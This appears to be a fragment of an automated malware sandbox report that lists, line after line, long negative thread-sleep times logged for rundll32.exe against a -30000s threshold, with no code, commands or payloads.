        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -43548s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -33867s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -38911s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -33260s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -37108s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -41515s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -32828s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -33900s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -30443s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -32046s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -33878s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -40843s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -34880s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -40350s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -39207s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -31355s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -37802s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -37398s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -36151s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -43423s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -37061s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -34317s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -35971s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -32592s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -40563s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -37358s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -39903s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -33835s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -36552s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -44143s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -39566s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -43568s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -34795s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -35523s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -35236s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -30672s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -37156s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -40768s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -32059s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -39022s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -42880s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -37975s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -36445s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -36796s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -37178s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -38605s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -33822s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -40375s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -31594s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -42380s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -37957s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -35650s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -39329s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -40620s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -43065s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -43743s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -43438s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -30172s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -36828s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -33389s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -34161s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -37783s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -38788s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -34156s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -40190s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -30433s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -41933s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -41337s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -33189s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -44234s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -30841s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -39399s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -32122s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -33786s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -42978s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -33792s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -37283s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -40707s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -40103s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -43150s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -42592s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -43335s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -43711s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -35863s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -34911s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -30756s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -36003s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -39016s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -44446s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -40573s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -34245s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -41446s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -34219s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -42971s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -39381s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -33193s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -30188s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -32128s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -36854s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -41556s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -30061s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -41314s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -41292s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -32771s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -32367s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -32091s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -38500s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -32887s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -38272s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -38152s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -31216s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -43796s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -33570s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -34906s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -44982s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -39031s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -35084s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -31143s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -32638s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -32348s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -33305s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -32096s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -41320s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -35207s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -40777s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -34849s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -39688s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -40423s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -37685s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -31028s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -39128s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -39836s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -33871s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -34649s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -31929s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -42897s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -39517s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -38937s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -41221s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -44035s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -35776s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -37554s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -39870s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -31719s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -43466s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -43412s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -42526s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -34021s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -36575s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -33796s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -30540s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -40177s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -31506s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -39450s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -36909s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -36656s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -42288s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -37092s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -41633s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -42910s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -36187s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -35142s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -38749s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -41585s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -40203s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -41233s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -36150s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -35590s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -38772s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -34075s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -44338s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -39443s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -42264s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -36699s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -44640s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -35566s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -38106s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -37365s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -30716s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -36070s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -31421s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -32001s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -36563s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -31400s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -41691s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -34077s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -41376s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -37617s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -34827s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -30431s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -38598s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -31944s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -33358s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -38566s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -30383s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -32246s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -37321s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -34953s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -40197s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -44368s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -39424s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -35340s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -32559s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -32998s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -30626s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -40643s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -33097s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -36019s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -43721s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -44986s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -43891s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -33181s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -43602s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -33249s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -43490s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -31392s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -41379s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -33239s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -42428s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -39622s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -43428s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -35848s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -31232s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -35748s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -41433s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -42656s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -36588s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -39079s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -41419s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -36679s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -38158s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -34713s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -38402s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -44778s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -40951s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -42161s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -40525s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -32470s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -39548s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -37958s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -33071s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -35831s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -37771s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -33424s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -38376s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -36514s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -34003s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -31725s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -42047s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -31077s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -40599s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -39935s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -43841s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -32474s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -33427s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -33187s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -36000s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -36444s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -35126s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -40384s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -34714s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -42468s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -30201s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -34371s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -33734s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -37029s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -43963s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -34499s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -35161s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -42946s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -44605s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -38301s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -32884s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -32084s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -31550s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -36863s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -30148s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -31212s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -39060s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -43288s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -37838s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -41705s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -41481s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -41017s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -42249s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -35243s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -30473s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -31109s >= -30000sJump to behavior
